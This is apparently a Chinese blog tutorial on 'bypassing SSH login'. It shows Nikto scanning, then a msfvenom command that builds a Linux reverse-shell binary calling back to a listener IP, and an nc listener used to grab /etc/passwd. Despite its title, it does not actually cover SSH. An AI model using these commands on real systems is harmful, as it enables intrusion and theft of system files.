黑客是如何绕过ssh登录目标站点

      黑客绕过SSH登录目标站点的手法多种多样,其中一些技术不仅复杂且极具隐蔽性,严重威胁着网络安全。SSH(安全外壳协议)作为一种广泛使用的远程登录协议,虽然本身具备一定的安全特性,但仍然是黑客攻击的重要目标之一。黑客通过利用SSH协议的特点和存在的安全漏洞,采取包括SSH欺骗、暴力破解密码、设置SSH后门以及绕过身份验证机制等多种手段,实现对目标站点的非法访问和控制。
      接下来,我们将深入探讨黑客如何利用这些手段绕过SSH登录目标站点,以便更好地理解其背后的技术原理和防御策略。这不仅有助于提升网络安全意识,也为制定相应的防护措施提供了宝贵的参考。

Nikto介绍

一个开源的 Web 服务器扫描器,它就像你网络安全工具箱中的瑞士军刀,帮助你发现潜在的安全漏洞。

望获系统安装nikto:

dnf install nikto

扫描目标

假设你有一个目标网站,比如 `http://example.com`。让我们开始扫描吧:

nikto -h http://example.com

扫描结果

扫描完成后,Nikto 会输出一些信息,比如:

找到的潜在漏洞

安全配置问题

  默认的 Web 应用程序和目录

每一条信息都是你冒险中的发现,帮助你更好地了解目标系统。

找到一个上传文件漏洞

从nikto找到一个上传文件漏洞。需要查阅对应服务器版本以及相关已修复漏洞。在此只做原理性解释和介绍。

重点:生成木马

使用metasploit工具msfvenom创建:

msfvenom -p linux/x64/shell_reverse_tcp -f elf lhost=192.168.77.133 lport=4444 > x64-re-shell

-p 指定平台为64位x86,系统为linux

-f  payload格式

lhost 黑客ip

lport 黑客设备的端口

根据小节4中的上传漏洞上传该木马并设置开机启动

演示

黑客设备上监听4444端口,执行:

nc -l -p 4444

受害者设备启动模拟:

黑客设备端显示:

黑客端拿下/etc/passwd。

总结

黑客绕过ssh加密认证登录,通过上传reverse shell拿下受害者设备。

防范措施:

通过端口安全管理,只开放经过安全认证的端口,快去看看你的设备端口有没有连接陌生ip。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值